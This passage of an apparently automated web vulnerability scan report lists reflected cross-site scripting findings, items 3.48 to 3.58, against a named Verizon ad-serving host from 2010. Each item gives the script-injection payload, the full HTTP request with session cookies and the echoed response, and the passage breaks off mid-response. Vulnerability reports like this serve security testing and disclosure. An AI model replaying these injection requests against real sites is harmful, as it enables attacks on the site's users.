3.48. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b232"><script>alert(1)</script>05b5cc07ece was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top6b232"><script>alert(1)</script>05b5cc07ece?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:01:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 351
Content-Type: text/html
Cache-Control: private
Content-Length: 351

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/623428622/Top6b232"><script>alert(1)</script>05b5cc07ece/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.49. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [audio_conf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497e1"><script>alert(1)</script>829630d20ba was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.50. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [bbaw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9e"><script>alert(1)</script>de0ed8fa512 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.51. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [connex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9336"><script>alert(1)</script>06f4f26e350 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
755/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg
...[SNIP]...

3.52. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiostvown parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde95"><script>alert(1)</script>a822f79e323 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
formA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.53. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiosvoice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37937"><script>alert(1)</script>e02e08d3502 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.54. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [msp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b765b"><script>alert(1)</script>85d8bcdeb44 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
6e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.55. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecc"><script>alert(1)</script>f8e5a220c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:59:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1366
Content-Type: text/html
Cache-Control: private
Content-Length: 1366

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1" target="_top">
...[SNIP]...

3.56. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [npa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcf3"><script>alert(1)</script>2819918f614 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
racking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.57. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [nxx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa3fa"><script>alert(1)</script>c8d299f1c04 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ng/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.58. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [online_backup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dcdc"><script>alert(1)</script>690eb2ffc82 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
